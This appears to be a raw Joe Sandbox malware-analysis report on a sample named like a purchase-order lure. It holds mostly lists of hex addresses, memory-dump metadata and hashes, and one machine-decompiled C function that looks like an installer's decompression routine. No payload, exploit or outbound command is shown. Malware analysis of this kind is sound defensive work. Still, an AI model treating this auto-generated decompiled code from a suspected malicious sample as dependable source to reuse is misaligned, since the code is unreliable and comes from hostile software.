                                                                                      0x004074c1
                                                                                      0x00000000
                                                                                      0x004074c1
                                                                                      0x0040752b
                                                                                      0x00407538
                                                                                      0x0040753b
                                                                                      0x00407447
                                                                                      0x00407447
                                                                                      0x00407447
                                                                                      0x00406be3
                                                                                      0x00406be3
                                                                                      0x00406be3
                                                                                      0x00406bec
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406bf2
                                                                                      0x00406bf2
                                                                                      0x00000000
                                                                                      0x00406bf9
                                                                                      0x00406bfd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c03
                                                                                      0x00406c06
                                                                                      0x00406c09
                                                                                      0x00406c0c
                                                                                      0x00406c10
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c16
                                                                                      0x00406c16
                                                                                      0x00406c19
                                                                                      0x00406c1b
                                                                                      0x00406c1c
                                                                                      0x00406c1f
                                                                                      0x00406c21
                                                                                      0x00406c22
                                                                                      0x00406c24
                                                                                      0x00406c27
                                                                                      0x00406c2c
                                                                                      0x00406c31
                                                                                      0x00406c3a
                                                                                      0x00406c4d
                                                                                      0x00406c50
                                                                                      0x00406c5c
                                                                                      0x00406c84
                                                                                      0x00406c86
                                                                                      0x00406c94
                                                                                      0x00406c94
                                                                                      0x00406c98
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c88
                                                                                      0x00406c88
                                                                                      0x00406c8b
                                                                                      0x00406c8c
                                                                                      0x00406c8c
                                                                                      0x00000000
                                                                                      0x00406c88
                                                                                      0x00406c5e
                                                                                      0x00406c62
                                                                                      0x00406c67
                                                                                      0x00406c67
                                                                                      0x00406c70
                                                                                      0x00406c78
                                                                                      0x00406c7b
                                                                                      0x00000000
                                                                                      0x00406c81
                                                                                      0x00406c81
                                                                                      0x00000000
                                                                                      0x00406c81
                                                                                      0x00000000
                                                                                      0x00406c9e
                                                                                      0x00406c9e
                                                                                      0x00406ca2
                                                                                      0x0040754e
                                                                                      0x0040754e
                                                                                      0x00000000
                                                                                      0x0040754e
                                                                                      0x00406ca8
                                                                                      0x00406cab
                                                                                      0x00406cbb
                                                                                      0x00406cbe
                                                                                      0x00406cc1
                                                                                      0x00406cc1
                                                                                      0x00406cc1
                                                                                      0x00406cc4
                                                                                      0x00406cc8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406cca
                                                                                      0x00406cca
                                                                                      0x00406cd0
                                                                                      0x00406cfa
                                                                                      0x00406d00
                                                                                      0x00406d07
                                                                                      0x00000000
                                                                                      0x00406d07
                                                                                      0x00406cd2
                                                                                      0x00406cd6
                                                                                      0x00406cd9
                                                                                      0x00406cde
                                                                                      0x00406cde
                                                                                      0x00406ce9
                                                                                      0x00406cf1
                                                                                      0x00406cf4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d39
                                                                                      0x00406d3f
                                                                                      0x00406d42
                                                                                      0x00406d4f
                                                                                      0x00406d57
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d0e
                                                                                      0x00406d0e
                                                                                      0x00406d12
                                                                                      0x0040755d
                                                                                      0x0040755d
                                                                                      0x00000000
                                                                                      0x0040755d
                                                                                      0x00406d18
                                                                                      0x00406d1e
                                                                                      0x00406d29
                                                                                      0x00406d29
                                                                                      0x00406d29
                                                                                      0x00406d2c
                                                                                      0x00406d2f
                                                                                      0x00406d32
                                                                                      0x00406d37
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004073ce
                                                                                      0x004073ce
                                                                                      0x004073d4
                                                                                      0x004073da
                                                                                      0x004073e0
                                                                                      0x004073fa
                                                                                      0x004073fd
                                                                                      0x00407403
                                                                                      0x0040740e
                                                                                      0x0040740e
                                                                                      0x00407410
                                                                                      0x004073e2
                                                                                      0x004073e2
                                                                                      0x004073f1
                                                                                      0x004073f5
                                                                                      0x004073f5
                                                                                      0x0040741a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040741c
                                                                                      0x00407420
                                                                                      0x004075cf
                                                                                      0x004075cf
                                                                                      0x00000000
                                                                                      0x004075cf
                                                                                      0x00407426
                                                                                      0x0040742c
                                                                                      0x00407433
                                                                                      0x0040743b
                                                                                      0x0040743e
                                                                                      0x00407441
                                                                                      0x00407441
                                                                                      0x00407447
                                                                                      0x00407447
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d5f
                                                                                      0x00406d5f
                                                                                      0x00406d61
                                                                                      0x00406d64
                                                                                      0x00406dd5
                                                                                      0x00406dd5
                                                                                      0x00406dd8
                                                                                      0x00406ddb
                                                                                      0x00406de2
                                                                                      0x00406dec
                                                                                      0x00000000
                                                                                      0x00406dec
                                                                                      0x00406d66
                                                                                      0x00406d66
                                                                                      0x00406d6a
                                                                                      0x00406d6d
                                                                                      0x00406d6f
                                                                                      0x00406d72
                                                                                      0x00406d75
                                                                                      0x00406d77
                                                                                      0x00406d7a
                                                                                      0x00406d7c
                                                                                      0x00406d81
                                                                                      0x00406d84
                                                                                      0x00406d87
                                                                                      0x00406d8b
                                                                                      0x00406d92
                                                                                      0x00406d95
                                                                                      0x00406d9c
                                                                                      0x00406da0
                                                                                      0x00406da8
                                                                                      0x00406da8
                                                                                      0x00406da8
                                                                                      0x00406da2
                                                                                      0x00406da2
                                                                                      0x00406da2
                                                                                      0x00406d97
                                                                                      0x00406d97
                                                                                      0x00406d97
                                                                                      0x00406dac
                                                                                      0x00406daf
                                                                                      0x00406dcd
                                                                                      0x00406dcd
                                                                                      0x00406dcf
                                                                                      0x00000000
                                                                                      0x00406db1
                                                                                      0x00406db1
                                                                                      0x00406db1
                                                                                      0x00406db4
                                                                                      0x00406db7
                                                                                      0x00406dba
                                                                                      0x00406dbc
                                                                                      0x00406dbc
                                                                                      0x00406dbc
                                                                                      0x00406dbf
                                                                                      0x00406dc2
                                                                                      0x00406dc4
                                                                                      0x00406dc5
                                                                                      0x00406dc8
                                                                                      0x00000000
                                                                                      0x00406dc8
                                                                                      0x00000000
                                                                                      0x00406ffe
                                                                                      0x00406ffe
                                                                                      0x00407002
                                                                                      0x00407020
                                                                                      0x00407020
                                                                                      0x00407023
                                                                                      0x0040702a
                                                                                      0x0040702d
                                                                                      0x00407030
                                                                                      0x00407033
                                                                                      0x00407036
                                                                                      0x00407039
                                                                                      0x0040703b
                                                                                      0x00407042
                                                                                      0x00407043
                                                                                      0x00407045
                                                                                      0x00407048
                                                                                      0x0040704b
                                                                                      0x0040704e
                                                                                      0x0040704e
                                                                                      0x00407053
                                                                                      0x00000000
                                                                                      0x00407053
                                                                                      0x00407004
                                                                                      0x00407004
                                                                                      0x00407007
                                                                                      0x0040700a
                                                                                      0x00407014
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407068
                                                                                      0x00407068
                                                                                      0x0040706c
                                                                                      0x0040708f
                                                                                      0x00407092
                                                                                      0x00407095
                                                                                      0x0040709f
                                                                                      0x0040706e
                                                                                      0x0040706e
                                                                                      0x00407071
                                                                                      0x00407074
                                                                                      0x00407077
                                                                                      0x00407084
                                                                                      0x00407087
                                                                                      0x00407087
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070ab
                                                                                      0x004070ab
                                                                                      0x004070af
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070b5
                                                                                      0x004070b5
                                                                                      0x004070b9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070bf
                                                                                      0x004070bf
                                                                                      0x004070c1
                                                                                      0x004070c5
                                                                                      0x004070c5
                                                                                      0x004070c8
                                                                                      0x004070cc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040711c
                                                                                      0x0040711c
                                                                                      0x00407120
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x0040712a
                                                                                      0x0040712d
                                                                                      0x00407137
                                                                                      0x00000000
                                                                                      0x00407137
                                                                                      0x00407122
                                                                                      0x00407122
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407143
                                                                                      0x00407143
                                                                                      0x00407147
                                                                                      0x0040714e
                                                                                      0x00407151
                                                                                      0x00407154
                                                                                      0x00407149
                                                                                      0x00407149
                                                                                      0x00407149
                                                                                      0x00407157
                                                                                      0x0040715a
                                                                                      0x0040715d
                                                                                      0x0040715d
                                                                                      0x00407160
                                                                                      0x00407163
                                                                                      0x00407166
                                                                                      0x00407166
                                                                                      0x00407169
                                                                                      0x00407170
                                                                                      0x00407175
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407203
                                                                                      0x00407203
                                                                                      0x00407207
                                                                                      0x004075a5
                                                                                      0x004075a5
                                                                                      0x00000000
                                                                                      0x004075a5
                                                                                      0x0040720d
                                                                                      0x0040720d
                                                                                      0x00407210
                                                                                      0x00407213
                                                                                      0x00407217
                                                                                      0x0040721a
                                                                                      0x00407220
                                                                                      0x00407222
                                                                                      0x00407222
                                                                                      0x00407222
                                                                                      0x00407225
                                                                                      0x00407228
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406df8
                                                                                      0x00406df8
                                                                                      0x00406dfc
                                                                                      0x00407569
                                                                                      0x00407569
                                                                                      0x00000000
                                                                                      0x00407569
                                                                                      0x00406e02
                                                                                      0x00406e02
                                                                                      0x00406e05
                                                                                      0x00406e08
                                                                                      0x00406e0c
                                                                                      0x00406e0f
                                                                                      0x00406e15
                                                                                      0x00406e17
                                                                                      0x00406e17
                                                                                      0x00406e17
                                                                                      0x00406e1a
                                                                                      0x00406e1d
                                                                                      0x00406e1d
                                                                                      0x00406e20
                                                                                      0x00406e23
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e29
                                                                                      0x00406e29
                                                                                      0x00406e2f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e35
                                                                                      0x00406e35
                                                                                      0x00406e39
                                                                                      0x00406e3c
                                                                                      0x00406e3f
                                                                                      0x00406e42
                                                                                      0x00406e45
                                                                                      0x00406e46
                                                                                      0x00406e49
                                                                                      0x00406e4b
                                                                                      0x00406e51
                                                                                      0x00406e54
                                                                                      0x00406e57
                                                                                      0x00406e5a
                                                                                      0x00406e5d
                                                                                      0x00406e60
                                                                                      0x00406e63
                                                                                      0x00406e7f
                                                                                      0x00406e82
                                                                                      0x00406e85
                                                                                      0x00406e88
                                                                                      0x00406e8f
                                                                                      0x00406e93
                                                                                      0x00406e95
                                                                                      0x00406e99
                                                                                      0x00406e65
                                                                                      0x00406e65
                                                                                      0x00406e69
                                                                                      0x00406e71
                                                                                      0x00406e76
                                                                                      0x00406e78
                                                                                      0x00406e7a
                                                                                      0x00406e7a
                                                                                      0x00406e9c
                                                                                      0x00406ea3
                                                                                      0x00406ea6
                                                                                      0x00000000
                                                                                      0x00406eac
                                                                                      0x00406eac
                                                                                      0x00000000
                                                                                      0x00406eac
                                                                                      0x00000000
                                                                                      0x00406eb1
                                                                                      0x00406eb1
                                                                                      0x00406eb5
                                                                                      0x00407575
                                                                                      0x00407575
                                                                                      0x00000000
                                                                                      0x00407575
                                                                                      0x00406ebb
                                                                                      0x00406ebb
                                                                                      0x00406ebe
                                                                                      0x00406ec1
                                                                                      0x00406ec5
                                                                                      0x00406ec8
                                                                                      0x00406ece
                                                                                      0x00406ed0
                                                                                      0x00406ed0
                                                                                      0x00406ed0
                                                                                      0x00406ed3
                                                                                      0x00406ed6
                                                                                      0x00406ed6
                                                                                      0x00406ed6
                                                                                      0x00406edc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406ede
                                                                                      0x00406ede
                                                                                      0x00406ee1
                                                                                      0x00406ee4
                                                                                      0x00406ee7
                                                                                      0x00406eea
                                                                                      0x00406eed
                                                                                      0x00406ef0
                                                                                      0x00406ef3
                                                                                      0x00406ef6
                                                                                      0x00406ef9
                                                                                      0x00406efc
                                                                                      0x00406f14
                                                                                      0x00406f17
                                                                                      0x00406f1a
                                                                                      0x00406f1d
                                                                                      0x00406f1d
                                                                                      0x00406f20
                                                                                      0x00406f24
                                                                                      0x00406f26
                                                                                      0x00406efe
                                                                                      0x00406efe
                                                                                      0x00406f06
                                                                                      0x00406f0b
                                                                                      0x00406f0d
                                                                                      0x00406f0f
                                                                                      0x00406f0f
                                                                                      0x00406f29
                                                                                      0x00406f30
                                                                                      0x00406f33
                                                                                      0x00000000
                                                                                      0x00406f35
                                                                                      0x00406f35
                                                                                      0x00000000
                                                                                      0x00406f35
                                                                                      0x00406f33
                                                                                      0x00406f3a
                                                                                      0x00406f3a
                                                                                      0x00406f3a
                                                                                      0x00406f3a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406f75
                                                                                      0x00406f75
                                                                                      0x00406f79
                                                                                      0x00407581
                                                                                      0x00407581
                                                                                      0x00000000
                                                                                      0x00407581
                                                                                      0x00406f7f
                                                                                      0x00406f7f
                                                                                      0x00406f82
                                                                                      0x00406f85
                                                                                      0x00406f89
                                                                                      0x00406f8c
                                                                                      0x00406f92
                                                                                      0x00406f94
                                                                                      0x00406f94
                                                                                      0x00406f94
                                                                                      0x00406f97
                                                                                      0x00406f9a
                                                                                      0x00406f9a
                                                                                      0x00406fa0
                                                                                      0x00406f3e
                                                                                      0x00406f3e
                                                                                      0x00406f41
                                                                                      0x00000000
                                                                                      0x00406f41
                                                                                      0x00406fa2
                                                                                      0x00406fa2
                                                                                      0x00406fa5
                                                                                      0x00406fa8
                                                                                      0x00406fab
                                                                                      0x00406fae
                                                                                      0x00406fb1
                                                                                      0x00406fb4
                                                                                      0x00406fb7
                                                                                      0x00406fba
                                                                                      0x00406fbd
                                                                                      0x00406fc0
                                                                                      0x00406fd8
                                                                                      0x00406fdb
                                                                                      0x00406fde
                                                                                      0x00406fe1
                                                                                      0x00406fe1
                                                                                      0x00406fe4
                                                                                      0x00406fe8
                                                                                      0x00406fea
                                                                                      0x00406fc2
                                                                                      0x00406fc2
                                                                                      0x00406fca
                                                                                      0x00406fcf
                                                                                      0x00406fd1
                                                                                      0x00406fd3
                                                                                      0x00406fd3
                                                                                      0x00406fed
                                                                                      0x00406ff4
                                                                                      0x00406ff7
                                                                                      0x00000000
                                                                                      0x00406ff9
                                                                                      0x00406ff9
                                                                                      0x00000000
                                                                                      0x00406ff9
                                                                                      0x00000000
                                                                                      0x00407286
                                                                                      0x00407286
                                                                                      0x0040728a
                                                                                      0x004075b1
                                                                                      0x004075b1
                                                                                      0x00000000
                                                                                      0x004075b1
                                                                                      0x00407290
                                                                                      0x00407290
                                                                                      0x00407293
                                                                                      0x00407296
                                                                                      0x0040729a
                                                                                      0x0040729d
                                                                                      0x004072a3
                                                                                      0x004072a5
                                                                                      0x004072a5
                                                                                      0x004072a5
                                                                                      0x004072a8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407056
                                                                                      0x00407056
                                                                                      0x00407059
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407395
                                                                                      0x00407395
                                                                                      0x00407399
                                                                                      0x004073bb
                                                                                      0x004073bb
                                                                                      0x004073be
                                                                                      0x004073c8
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x00000000
                                                                                      0x004073cb
                                                                                      0x0040739b
                                                                                      0x0040739b
                                                                                      0x0040739e
                                                                                      0x004073a2
                                                                                      0x004073a5
                                                                                      0x004073a5
                                                                                      0x004073a8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407452
                                                                                      0x00407452
                                                                                      0x00407456
                                                                                      0x00407474
                                                                                      0x00407474
                                                                                      0x00407474
                                                                                      0x00407474
                                                                                      0x0040747b
                                                                                      0x00407482
                                                                                      0x00407489
                                                                                      0x00407489
                                                                                      0x00407490
                                                                                      0x00407493
                                                                                      0x0040749a
                                                                                      0x00000000
                                                                                      0x0040749d
                                                                                      0x00407458
                                                                                      0x00407458
                                                                                      0x0040745b
                                                                                      0x0040745e
                                                                                      0x00407461
                                                                                      0x00407468
                                                                                      0x004073ac
                                                                                      0x004073ac
                                                                                      0x004073af
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407543
                                                                                      0x00407543
                                                                                      0x00407546
                                                                                      0x00407447
                                                                                      0x00407447
                                                                                      0x00407447
                                                                                      0x00000000
                                                                                      0x0040744d
                                                                                      0x00000000
                                                                                      0x0040717d
                                                                                      0x0040717d
                                                                                      0x0040717f
                                                                                      0x00407186
                                                                                      0x00407187
                                                                                      0x00407189
                                                                                      0x0040718c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407490
                                                                                      0x00407490
                                                                                      0x00407493
                                                                                      0x0040749a
                                                                                      0x00000000
                                                                                      0x0040749d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004071c2
                                                                                      0x004071c2
                                                                                      0x004071c5
                                                                                      0x004071fb
                                                                                      0x004071fb
                                                                                      0x0040732b
                                                                                      0x0040732b
                                                                                      0x0040732b
                                                                                      0x0040732b
                                                                                      0x0040732e
                                                                                      0x0040732e
                                                                                      0x00407331
                                                                                      0x00407333
                                                                                      0x004075bd
                                                                                      0x004075bd
                                                                                      0x00000000
                                                                                      0x004075bd
                                                                                      0x00407339
                                                                                      0x00407339
                                                                                      0x0040733c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407342
                                                                                      0x00407342
                                                                                      0x00407346
                                                                                      0x00407349
                                                                                      0x00407349
                                                                                      0x00407349
                                                                                      0x00000000
                                                                                      0x00407349
                                                                                      0x004071c7
                                                                                      0x004071c7
                                                                                      0x004071c9
                                                                                      0x004071cb
                                                                                      0x004071cd
                                                                                      0x004071d0
                                                                                      0x004071d1
                                                                                      0x004071d3
                                                                                      0x004071d5
                                                                                      0x004071d8
                                                                                      0x004071db
                                                                                      0x004071f1
                                                                                      0x004071f1
                                                                                      0x004071f6
                                                                                      0x0040722e
                                                                                      0x0040722e
                                                                                      0x00407232
                                                                                      0x0040725b
                                                                                      0x0040725e
                                                                                      0x00407260
                                                                                      0x00407267
                                                                                      0x0040726a
                                                                                      0x0040726d
                                                                                      0x0040726d
                                                                                      0x00407272
                                                                                      0x00407272
                                                                                      0x00407274
                                                                                      0x00407277
                                                                                      0x0040727e
                                                                                      0x00407281
                                                                                      0x004072ae
                                                                                      0x004072ae
                                                                                      0x004072b1
                                                                                      0x004072b4
                                                                                      0x00407328
                                                                                      0x00407328
                                                                                      0x00407328
                                                                                      0x00407328
                                                                                      0x00000000
                                                                                      0x00407328
                                                                                      0x004072b6
                                                                                      0x004072b6
                                                                                      0x004072bc
                                                                                      0x004072bf
                                                                                      0x004072c2
                                                                                      0x004072c5
                                                                                      0x004072c8
                                                                                      0x004072cb
                                                                                      0x004072ce
                                                                                      0x004072d1
                                                                                      0x004072d4
                                                                                      0x004072d7
                                                                                      0x004072f0
                                                                                      0x004072f2
                                                                                      0x004072f5
                                                                                      0x004072f6
                                                                                      0x004072f9
                                                                                      0x004072fb
                                                                                      0x004072fe
                                                                                      0x00407300
                                                                                      0x00407302
                                                                                      0x00407305
                                                                                      0x00407307
                                                                                      0x0040730a
                                                                                      0x0040730e
                                                                                      0x00407310
                                                                                      0x00407310
                                                                                      0x00407311
                                                                                      0x00407314
                                                                                      0x00407317
                                                                                      0x004072d9
                                                                                      0x004072d9
                                                                                      0x004072e1
                                                                                      0x004072e6
                                                                                      0x004072e8
                                                                                      0x004072eb
                                                                                      0x004072eb
                                                                                      0x0040731a
                                                                                      0x00407321
                                                                                      0x004072ab
                                                                                      0x004072ab
                                                                                      0x004072ab
                                                                                      0x004072ab
                                                                                      0x00000000
                                                                                      0x00407323
                                                                                      0x00407323
                                                                                      0x00000000
                                                                                      0x00407323
                                                                                      0x00407321
                                                                                      0x00407234
                                                                                      0x00407234
                                                                                      0x00407237
                                                                                      0x00407239
                                                                                      0x0040723c
                                                                                      0x0040723f
                                                                                      0x00407242
                                                                                      0x00407244
                                                                                      0x00407247
                                                                                      0x0040724a
                                                                                      0x0040724a
                                                                                      0x0040724d
                                                                                      0x0040724d
                                                                                      0x00407250
                                                                                      0x00407257
                                                                                      0x0040722b
                                                                                      0x0040722b
                                                                                      0x0040722b
                                                                                      0x0040722b
                                                                                      0x00000000
                                                                                      0x00407259
                                                                                      0x00407259
                                                                                      0x00000000
                                                                                      0x00407259
                                                                                      0x00407257
                                                                                      0x004071dd
                                                                                      0x004071dd
                                                                                      0x004071e0
                                                                                      0x004071e2
                                                                                      0x004071e5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406f44
                                                                                      0x00406f44
                                                                                      0x00406f48
                                                                                      0x0040758d
                                                                                      0x0040758d
                                                                                      0x00000000
                                                                                      0x0040758d
                                                                                      0x00406f4e
                                                                                      0x00406f4e
                                                                                      0x00406f51
                                                                                      0x00406f54
                                                                                      0x00406f57
                                                                                      0x00406f5a
                                                                                      0x00406f5d
                                                                                      0x00406f60
                                                                                      0x00406f62
                                                                                      0x00406f65
                                                                                      0x00406f68
                                                                                      0x00406f6b
                                                                                      0x00406f6d
                                                                                      0x00406f6d
                                                                                      0x00406f6d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070cf
                                                                                      0x004070cf
                                                                                      0x004070d3
                                                                                      0x00407599
                                                                                      0x00407599
                                                                                      0x00000000
                                                                                      0x00407599
                                                                                      0x004070d9
                                                                                      0x004070d9
                                                                                      0x004070dc
                                                                                      0x004070df
                                                                                      0x004070e2
                                                                                      0x004070e4
                                                                                      0x004070e4
                                                                                      0x004070e4
                                                                                      0x004070e7
                                                                                      0x004070ea
                                                                                      0x004070ed
                                                                                      0x004070f0
                                                                                      0x004070f3
                                                                                      0x004070f6
                                                                                      0x004070f7
                                                                                      0x004070f9
                                                                                      0x004070f9
                                                                                      0x004070f9
                                                                                      0x004070fc
                                                                                      0x004070ff
                                                                                      0x00407102
                                                                                      0x00407105
                                                                                      0x00407105
                                                                                      0x00407105
                                                                                      0x00407108
                                                                                      0x0040710a
                                                                                      0x0040710a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040734c
                                                                                      0x0040734c
                                                                                      0x0040734c
                                                                                      0x00407350
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407356
                                                                                      0x00407356
                                                                                      0x00407359
                                                                                      0x0040735c
                                                                                      0x0040735f
                                                                                      0x00407361
                                                                                      0x00407361
                                                                                      0x00407361
                                                                                      0x00407364
                                                                                      0x00407367
                                                                                      0x0040736a
                                                                                      0x0040736d
                                                                                      0x00407370
                                                                                      0x00407373
                                                                                      0x00407374
                                                                                      0x00407376
                                                                                      0x00407376
                                                                                      0x00407376
                                                                                      0x00407379
                                                                                      0x0040737c
                                                                                      0x0040737f
                                                                                      0x00407382
                                                                                      0x00407385
                                                                                      0x00407389
                                                                                      0x0040738b
                                                                                      0x0040738e
                                                                                      0x00000000
                                                                                      0x00407390
                                                                                      0x00407390
                                                                                      0x0040710d
                                                                                      0x0040710d
                                                                                      0x00000000
                                                                                      0x0040710d
                                                                                      0x0040738e
                                                                                      0x004075c3
                                                                                      0x004075c3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406bf2
                                                                                      0x004075fa
                                                                                      0x004075fa
                                                                                      0x00000000
                                                                                      0x004075fa
                                                                                      0x00407447
                                                                                      0x004074c7
                                                                                      0x00407490

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                      • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                                                      • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                      • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 98%
                                                                                      			E00407395() {
                                                                                      				void _t533;
                                                                                      				signed int _t534;
                                                                                      				signed int _t535;
                                                                                      				signed int* _t605;
                                                                                      				void* _t612;
                                                                                      
                                                                                      				L0:
                                                                                      				while(1) {
                                                                                      					L0:
                                                                                      					if( *(_t612 - 0x40) != 0) {
                                                                                      						 *(_t612 - 0x84) = 0x13;
                                                                                      						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                                                      						goto L132;
                                                                                      					} else {
                                                                                      						__eax =  *(__ebp - 0x4c);
                                                                                      						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                      						__ecx =  *(__ebp - 0x58);
                                                                                      						__eax =  *(__ebp - 0x4c) << 4;
                                                                                      						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                      						L130:
                                                                                      						 *(__ebp - 0x58) = __eax;
                                                                                      						 *(__ebp - 0x40) = 3;
                                                                                      						L144:
                                                                                      						 *(__ebp - 0x7c) = 0x14;
                                                                                      						L145:
                                                                                      						__eax =  *(__ebp - 0x40);
                                                                                      						 *(__ebp - 0x50) = 1;
                                                                                      						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                      						L149:
                                                                                      						if( *(__ebp - 0x48) <= 0) {
                                                                                      							__ecx =  *(__ebp - 0x40);
                                                                                      							__ebx =  *(__ebp - 0x50);
                                                                                      							0 = 1;
                                                                                      							__eax = 1 << __cl;
                                                                                      							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                      							__eax =  *(__ebp - 0x7c);
                                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                                      							while(1) {
                                                                                      								L140:
                                                                                      								 *(_t612 - 0x88) = _t533;
                                                                                      								while(1) {
                                                                                      									L1:
                                                                                      									_t534 =  *(_t612 - 0x88);
                                                                                      									if(_t534 > 0x1c) {
                                                                                      										break;
                                                                                      									}
                                                                                      									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                                      										case 0:
                                                                                      											if( *(_t612 - 0x6c) == 0) {
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                      											_t534 =  *( *(_t612 - 0x70));
                                                                                      											if(_t534 > 0xe1) {
                                                                                      												goto L171;
                                                                                      											}
                                                                                      											_t538 = _t534 & 0x000000ff;
                                                                                      											_push(0x2d);
                                                                                      											asm("cdq");
                                                                                      											_pop(_t569);
                                                                                      											_push(9);
                                                                                      											_pop(_t570);
                                                                                      											_t608 = _t538 / _t569;
                                                                                      											_t540 = _t538 % _t569 & 0x000000ff;
                                                                                      											asm("cdq");
                                                                                      											_t603 = _t540 % _t570 & 0x000000ff;
                                                                                      											 *(_t612 - 0x3c) = _t603;
                                                                                      											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                                                      											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                                                      											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                                                      											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                                                      												L10:
                                                                                      												if(_t611 == 0) {
                                                                                      													L12:
                                                                                      													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                                                      													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                      													goto L15;
                                                                                      												} else {
                                                                                      													goto L11;
                                                                                      												}
                                                                                      												do {
                                                                                      													L11:
                                                                                      													_t611 = _t611 - 1;
                                                                                      													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                                                      												} while (_t611 != 0);
                                                                                      												goto L12;
                                                                                      											}
                                                                                      											if( *(_t612 - 4) != 0) {
                                                                                      												GlobalFree( *(_t612 - 4));
                                                                                      											}
                                                                                      											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                      											 *(_t612 - 4) = _t534;
                                                                                      											if(_t534 == 0) {
                                                                                      												goto L171;
                                                                                      											} else {
                                                                                      												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                                                      												goto L10;
                                                                                      											}
                                                                                      										case 1:
                                                                                      											L13:
                                                                                      											__eflags =  *(_t612 - 0x6c);
                                                                                      											if( *(_t612 - 0x6c) == 0) {
                                                                                      												 *(_t612 - 0x88) = 1;
